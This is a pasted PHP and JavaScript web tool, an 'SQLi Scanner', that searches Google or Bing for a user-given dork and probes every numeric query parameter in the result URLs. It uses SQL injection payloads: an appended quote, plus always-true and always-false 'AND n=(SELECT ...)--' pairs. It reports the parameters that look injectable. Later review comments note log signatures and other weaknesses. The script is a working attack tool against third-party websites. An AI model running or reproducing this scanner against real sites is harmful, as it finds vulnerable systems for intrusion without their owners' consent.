sirnon

google bypass

Aug 16th, 2013
  1. <?php
  2. /* Google dork scanner
  3. * yepss... you know what this is
  4. *
  5. */
  6.  
  7.  
// NOTE(review): nothing in this listing authenticates the caller, so anyone who can
// reach this file over HTTP can drive the scanner from the hosting server's IP address.
// An unexpected copy of this file under a web root should be handled as a sign of compromise.

// Silence all PHP error output; failures in the code below are therefore not shown.
@error_reporting(0);
// Cap each request at 60 seconds of execution time.
@set_time_limit(60);
  10.  
  11. function fetch($url) {
  12. if(!function_exists("curl_init")){
  13. $bu = trim(@file_get_contents($url));
  14. if($bu == "") return "";
  15. else return $bu;
  16. }
  17.  
  18. $header[] = "Accept-Language: en";
  19. $header[] = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3";
  20. $header[] = "Connection: Keep-Alive";
  21. $header[] = "Pragma: no-cache";
  22. $header[] = "Cache-Control: no-cache";
  23.  
  24. $ch = curl_init();
  25. curl_setopt($ch, CURLOPT_URL, $url);
  26. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  27. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE );
  28. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
  29. curl_setopt($ch, CURLOPT_TIMEOUT, 7);
  30. curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
  31. $content = curl_exec($ch);
  32. curl_close($ch);
  33. return $content;
  34. }
  35.  
/**
 * Quick error-based check of one URL.
 *
 * For every query-string parameter whose value is numeric, the URL is requested
 * once with an encoded single quote (%27) appended to that name=value pair, and
 * the response is searched for database error text.
 *
 * Defender's view: in access logs this shows up as a GET whose numeric parameter
 * value is followed by %27, sent with the fixed User-Agent set in fetch(). The
 * check only has something to match when the application returns raw database
 * error messages to the client.
 *
 * @param string $url_ Candidate URL; any leading "http://" is stripped and re-added.
 * @return string Name of the first parameter whose response matched, or "" if none.
 */
function sqlcheck($url_){
    // clean url
    $url_ = "http://".trim(str_ireplace("http://","",$url_));
    // Result links are taken from HTML source, so decode the ampersand entity.
    $url_ = str_ireplace("&amp;","&",$url_);
    $urls = explode("?",$url_);
    // check if url contains querystring (exactly one "?" is required)
    if(count($urls)==2){
        $url = $urls[0];
        $querys = explode("&",$urls[1]);
        foreach($querys as $query){
            $vars = explode("=",$query);
            //echo $query;
            // check if parameter has a numeric value
            if((count($vars)>=2) && (is_numeric($vars[1]))){
                // Append %27 wherever this name=value text occurs in the URL.
                $final = str_replace($query,$query."%27",$url_);
                //echo $final;
                $content = fetch($final);
                // Match well-known database error phrases, case-insensitively.
                if(preg_match("/sql syntax|sql error|right syntax to use near|syntax error converting|unclosed quotation|is not a valid MySQL result/i",$content)){
                    return $vars[0];
                }
            }
        }
    }
    return ""; // nothing matched
}
/**
 * Slower differential check of one URL.
 *
 * For every numeric query-string parameter, two requests are sent: one with an
 * appended condition that is always true and one with a condition that is always
 * false. The tag-stripped response lengths are compared; when the "true" response
 * is at least 30 bytes longer, the parameter is reported. If the unquoted pair
 * shows no such difference, the same comparison is repeated with a quote-delimited
 * variant.
 *
 * Defender's view: up to four requests per numeric parameter arrive back to back
 * from one address, each carrying "%20AND%20<4 digits>%3D%28SELECT%20" in the
 * query string, with the fixed User-Agent set in fetch(). That substring is a
 * practical log and WAF signature for this script.
 *
 * @param string $url_ Candidate URL; any leading "http://" is stripped and re-added.
 * @return string Name of the first parameter that showed a difference, or "" if none.
 */
function sqlheavycheck($url_){
    // clean url
    $url_ = "http://".trim(str_ireplace("http://","",$url_));
    $url_ = str_ireplace("&amp;","&",$url_);

    // check if url contains querystring
    $pos = stripos($url_,"?");
    if($pos !== false){
        // Split at the first "?" only; $url is not used further in this function.
        $url = substr($url_,0,$pos);
        $que = substr($url_,$pos+1);


        $querys = explode("&",$que);
        foreach($querys as $query){
            $vars = explode("=",$query);
            //echo $query;
            // check if parameter has a numeric value
            if((count($vars)>=2) && (is_numeric($vars[1]))){
                // and 1=(select 1)  -- always-true condition, random 4-digit constant
                $acak = rand(1111,9999);
                $final = str_replace($query,$query."%20AND%20".$acak."%3D%28SELECT%20".$acak."%29--",$url_);
                $contrue = fetch($final);
                //echo "final1 : ".$final."<br />";

                // and 1=(select 0)  -- always-false condition
                $acak = rand(1111,9999);
                $final = str_replace($query,$query."%20AND%20".$acak."%3D%28SELECT%200%29--",$url_);
                //echo "final2 : ".$final."<br />";
                $confalse = fetch($final);

                // Compare visible text length of the two responses.
                $numtrue = strlen(strip_tags($contrue));
                $numfalse = strlen(strip_tags($confalse));
                $selisih = $numtrue - $numfalse; // "selisih" = difference


                if($selisih >= 30){
                    return $vars[0];
                }
                else{
                    //' and 1=(select 1) and '1'='1  -- quote-delimited always-true variant
                    $acak = rand(1111,9999);
                    $final = str_replace($query,$query."%27%20AND%20".$acak."%3D%28SELECT%20".$acak."%29%20AND%20%271%27=%271",$url_);
                    $contrue = fetch($final);
                    //echo "final1 : ".$final."<br />";

                    //' and 1=(select 0) and '1'='1  -- quote-delimited always-false variant
                    $acak = rand(1111,9999);
                    $final = str_replace($query,$query."%27%20AND%20".$acak."%3D%28SELECT%200%29%20AND%20%271%27=%271",$url_);
                    //echo "final2 : ".$final."<br />";
                    $confalse = fetch($final);

                    $numtrue = strlen(strip_tags($contrue));
                    $numfalse = strlen(strip_tags($confalse));
                    $selisih = $numtrue - $numfalse;

                    if($selisih >= 30){
                        return $vars[0];
                    }
                }
            }
        }
    }
    return ""; // nothing matched
}
  125.  
  126.  
  127. // debugging tools
  128. if(isset($_GET['check'])&&($_GET['check']!="")){
  129. $url = $_GET['check'];
  130. echo $url." ".sqlcheck($url);
  131. die();
  132. }
  133. if(isset($_GET['heavycheck'])&&($_GET['heavycheck']!="")){
  134. $url = $_GET['heavycheck'];
  135. echo $url." ".sqlheavycheck($url);
  136. die();
  137. }
  138. // debugging tools end
  139.  
  140.  
  141. if(isset($_GET['dork'])&&($_GET['dork']!="")){
  142. $gnum = 10; // jumlah hasil pencarian perhalaman
  143. $setype = "google"; // default cari pakek g00gle
  144. if(isset($_GET['setype'])) $setype = strtolower(trim($_GET['setype']));
  145.  
  146. if(isset($_GET['page'])){
  147. $gpage = (int) $_GET['page'];
  148. if($gpage < 1) $gpage = 1;
  149. }
  150. else $gpage = 1;
  151. $gpage = ($gpage - 1) * $gnum;
  152.  
  153. if($gpage > ($gpage * $gnum)){
  154. echo "_finish_|max only ".$gpage." results";
  155. die();
  156. }
  157.  
  158. $dork = stripslashes($_GET['dork']);
  159. $dork = str_replace(" ","+",$dork);
  160. $dorki = urlencode($dork);
  161.  
  162. if($setype == "google"){
  163. //g00gle nextbuttn---> <div class=med style=margin-top:2em>
  164. $gsearch = fetch("http://www.google.com/custom?num=".$gnum."&hl=en&cx=!009136828022434855111:b1vm8yfl888&q=".$dorki."&start=".$gpage."&sa=N");
  165. $raws = explode("<h2 class=r>",$gsearch);
  166. if((trim($gsearch) == "") || (count($raws) <= 1) || (preg_match("/div\sclass=med\sstyle=margin-top:2em/i",$gsearch))){
  167. echo "_finish_|no more search results from ".$setype;
  168. die();
  169. }
  170.  
  171. }
  172. elseif($setype == "bing"){
  173. //bing nextbutton---> class="sb_pagN"
  174. $dorki = preg_replace("/^[^:]*:(.*)/i","\\1",$dork);
  175. $gsearch = fetch("http://www.bing.com/search?q=".$dorki."&filt=all&first=".$gpage."&FORM=PERE3");
  176. $raws = explode("<div class=\"sb_tlst\"><h3>",$gsearch);
  177. if((trim($gsearch) == "") || (!preg_match("/class=\"sb_pagN\"/i",$gsearch)) || (count($raws) <= 1)){
  178. echo "_finish_|no more search results from ".$setype;
  179. die();
  180. }
  181. }
  182. else{
  183. echo "_finish_|search engine not supported";
  184. die();
  185. }
  186.  
  187. foreach($raws as $korban){
  188. if(strlen($korban) >= 9 && (substr($korban,0,9)=="<a href=\"")){
  189. $heavy = false;
  190. if((isset($_GET['heavy'])) && ($_GET['heavy']=='1')) $heavy = true;
  191.  
  192. $calon = substr($korban,9);
  193. $pos = strpos($calon,"\"");
  194. if($pos !== false){
  195. $url = trim(substr($calon,0,$pos));
  196. if(preg_match("/facebook\.|yahoo\.|google\.|youtube\./i",$url)) continue;
  197. if(!preg_match("/\w+=\d+/i",$url)) continue;
  198.  
  199. if($heavy) {
  200. $vulnvar = sqlheavycheck($url);
  201. if($vulnvar != "") $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\"><span class=\"white\">".$url."</span><span class=\"red\"> @ </span><span class=\"white\">".$vulnvar."</span></a><br />";
  202. else $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\">".$url."</a><br />";
  203. echo $laporan;
  204.  
  205. }
  206. else{
  207. $vulnvar = sqlcheck($url);
  208. if($vulnvar != "") $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\"><span class=\"white\">".$url."</span><span class=\"red\"> @ </span><span class=\"white\">".$vulnvar."</span></a><br />";
  209. else $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\">".$url."</a><br />";
  210. echo $laporan;
  211. }
  212. }
  213. }
  214. }
  215. die(); // mas kamu koq looyo...
  216. }
  217.  
  218.  
  219.  
  220. ?><html>
  221. <head><title>SQLi Scanner</title>
  222. <link rel="shortcut icon" href="../favicon.ico">
  223. <!-- <?php echo date("Y",time()); ?> Revan Aditya -->
  224. <script type="text/javascript">
// Page-wide state shared by the functions below (implicit globals).
jalan = false;   // "running": true while a scan loop is active
nomer = 1;       // "number": next result page to request
nomermax = 100;  // not read by any function in this listing
heavy = false;   // mirrors the "Depth scan" checkbox; written by checkheavy()
  229.  
// Send an asynchronous GET to the current page with `vars` plus "&page=<nom>" as the
// query string. When the request completes with HTTP 200 and a non-empty body,
// cbFunction(body, vars) is called; any other outcome is ignored.
function ajax(vars, nom, cbFunction){
    var xhr;
    if (window.XMLHttpRequest) {
        xhr = new XMLHttpRequest();
    } else {
        // Legacy Internet Explorer path.
        xhr = new ActiveXObject("MSXML2.XMLHTTP.3.0");
    }
    var target = '?' + vars + '&page=' + nom;
    xhr.open("GET", target, true);
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xhr.onreadystatechange = function(){
        if (xhr.readyState != 4 || xhr.status != 200) {
            return;
        }
        if (!xhr.responseText) {
            return;
        }
        cbFunction(xhr.responseText, vars);
    }
    xhr.send(null);
}
// Callback for ajax(): append one server response to the result box, then either
// request the next page, show "paused", or finish, and scroll to the bottom.
//   str  - response body (HTML anchors, or "_finish_|<message>")
//   vars - the query string that produced it, reused for the next page
// NOTE(review): str is inserted with innerHTML, so any markup in the server response
// is parsed by the browser; the response embeds text taken from third-party pages.
function showResult(str, vars){
    var box = document.getElementById("result")
    // A PHP warning or fatal text in the body is shown as a generic error line.
    if(str.match(/Warning|Fatal/gi)) box.innerHTML += '<span class=\"red\">*** </span> error...<br />';
    else box.innerHTML += str;

    if(!jalan){
        // The user pressed Pause while this request was in flight.
        box.innerHTML += '<span class=\"red\">*** </span> paused...<br />';
        document.getElementById("loading").style.visibility = 'hidden';
        document.getElementById("btnOk").value = "Resume";
    }
    else {
        if(!str.match(/.*finish.*/gi)){
            // Still running and no finish marker: fetch the next page.
            sqlCheck(vars);
        }
        else{
            // Text after the "|" is the reason the server stopped.
            var pesan = str.substring(str.indexOf("|") + 1);
            // Assignment (not +=): this replaces everything shown so far.
            box.innerHTML = '<span class=\"red\">*** </span> finish ( ' + pesan + ' )<br />';
            document.getElementById('setype').disabled = false;
            document.getElementById('dork').readOnly = false;
            document.getElementById("loading").style.visibility = 'hidden';
            document.getElementById("btnOk").value = "Search";
            nomer = 1;
            jalan = false;
        }
    }

    // Scroll down in 50px steps until the scroll position stops changing.
    var oldYPos = 0, newYPos = 0;
    do{
        if (document.all){
            oldYPos = document.body.scrollTop;
        }
        else{
            oldYPos = window.pageYOffset;
        }
        window.scrollBy(0, 50);
        if (document.all){
            newYPos = document.body.scrollTop;
        }
        else{
            newYPos = window.pageYOffset;
        }
    } while (oldYPos < newYPos);
}
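// Key-press handler for the document: pressing Enter (key code 13) calls sikat().
//   ev - the key event; falls back to window.event on old Internet Explorer.
function keyHandler(ev){
    if (!ev){
        ev = window.event;
    }
    // Declared locally: the original assigned an undeclared `keycode`, which leaked a
    // global and threw a ReferenceError when the event carried neither property.
    var keycode = ev.which || ev.keyCode;
    if (keycode == 13){
        sikat();
    }
}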
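// Fallback for engines without String.prototype.trim. Guarded so that the native
// implementation is not overwritten where it exists.
if (!String.prototype.trim) {
    String.prototype.trim = function() {
        return this.replace(/^\s*|\s*$/g, "");
    };
}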
// While a scan is running, request result page `nomer` for the query string `xdata`
// and advance the page counter. Does nothing when the scan is paused.
function sqlCheck(xdata){
    if (!jalan) {
        return;
    }
    ajax(xdata, nomer, showResult);
    nomer += 1;
}
// Same as sqlCheck(), but adds "&heavy=1" to the query string so the server uses its
// slower differential check. Does nothing when the scan is paused.
function sqlHeavyCheck(xdata){
    if (!jalan) {
        return;
    }
    ajax(xdata + '&heavy=1', nomer, showResult);
    nomer += 1;
}
// Click handler of the main button. Depending on the button label it starts a new
// scan ("Search"), continues one ("Resume"), or pauses the running one (any other
// label, i.e. "Pause").
function sikat(){
    var button = document.getElementById("btnOk");
    var label = button.value;

    if (label != 'Search' && label != 'Resume'){
        berhenti();
        return;
    }
    if (jalan){
        alert("Please stop first...");
        return;
    }

    // A fresh search starts from the first result page; Resume keeps the counter.
    if (label == 'Search') nomer = 1;

    var target = document.getElementById('dork');
    var setype = document.getElementById('setype');
    if (!(target.value.trim().length > 0)) {
        return;
    }

    // Lock the inputs and show the spinner while the scan loop runs.
    document.getElementById("loading").style.visibility = 'visible';
    document.getElementById("btnOk").value = "Pause";
    target.readOnly = true;
    setype.disabled = true;
    jalan = true;
    sqlCheck('dork=' + encodeURIComponent(target.value) + '&setype=' + encodeURIComponent(setype.value));
}
// Runs from <body onload>: route every key press on the document to keyHandler().
function initpg(){
    document.onkeypress = keyHandler;
}
// "berhenti" = stop: clear the running flag so no further page is requested.
function berhenti(){
    jalan = false;
}
// "bersih" = clean: after confirmation, reload index.php, which discards all results.
function bersih(){
    if (confirm("Clear results and restart?") == true) {
        location.href = 'index.php';
    }
}
// Click handler of the "Depth scan" text link: flip the checkbox by hand, then apply
// the new state through checkheavy().
function checkheavy_fix(){
    var checkbox = document.getElementById("heavy");
    checkbox.checked = checkbox.checked ? false : true;
    checkheavy();
}
// Copy the "Depth scan" checkbox state into the global `heavy` flag and log the
// selected mode in the result box.
function checkheavy(){
    var checked = document.getElementById("heavy").checked;
    var box = document.getElementById("result");
    var line = checked
        ? '<span class=\"red\">*** </span> depth scan...<br />'
        : '<span class=\"red\">*** </span> quick scan...<br />';
    heavy = checked ? true : false;
    box.innerHTML += line;
}
  366.  
  367. </script>
  368. <style type="text/css">
/* Page styling: dark background, small monospace-style text, red accents. */
*{
    background:url('../images/bg.gif') #111;
    font-family: Lucida Console,Tahoma;
    color:#bbb;
    font-size:11px;
    text-align:left;
}
/* Form controls. The second border declaration overrides the first. */
input,select,textarea{
    border:0;
    border:1px solid #900;
    color:#fff;
    background:#000;
    margin:0;
    padding:2px 4px;
}
input:hover,textarea:hover,select:hover{
    background:#200;
    border:1px solid #f00;
}
option{
    background:#000;
}
/* .red and .white are the classes used in the result lines built by the server. */
.red{
    color:#f00;
}
.white{
    color:#fff;
}
a{
    text-decoration:none;
}
a:hover{
    border-bottom:1px solid #900;
    border-top:1px solid #900;
}
#status{
    width:100%;
    height:auto;
    padding:4px 0;
    border-bottom:1px solid #300;
}
/* Links inside the result box are dimmed unless wrapped in .white. */
#result a{
    color:#777;
}
.sign{
    color:#222;
}
#box{
    margin:10px 0 0 0;
}
  420. </head>
  421. <body onload="initpg();">
  422.  
  423.  
  424.  
  425. <div id="result"></div>
  426. <div id="box">
  427. <input type="text" name="dork" id="dork" value="" style="width:400px;" title="Give a keyword to search..." />
  428. <select name="setype" id="setype">
  429. <option value="google" />Google</option>
  430. <option value="bing" />Bing</option>
  431. </select>
  432. <input type="submit" id="btnOk" name="btnOk" value="Search" onclick="sikat();" style="width:70px;text-align:center;" />
  433. <input type="submit" name="btnClear" value="Restart" onclick="bersih();" style="width:70px;text-align:center;" />
  434. <span class="sign">revres</span><span class="red">.</span><span class="sign">tanur</span>
  435. <img src="../images/loading.gif" alt="" style="margin:0;padding:0;vertical-align:middle;visibility:hidden;" id="loading" title="loading..." />
  436. <p><input onclick="checkheavy();" style="vertical-align:middle;margin:0 8px;padding:0;border:0;" type="checkbox" name="heavy" id="heavy" /><a style="vertical-align:middle;" href="javascript:checkheavy_fix();">Depth scan ( slow but sure )</a></p>
  437. </div>
  438.  
  439.  
  440. <!-- aku suka kamu suka sudah jangan bilang syapaa syapaaa... -->
  441. </body>
  442. </html>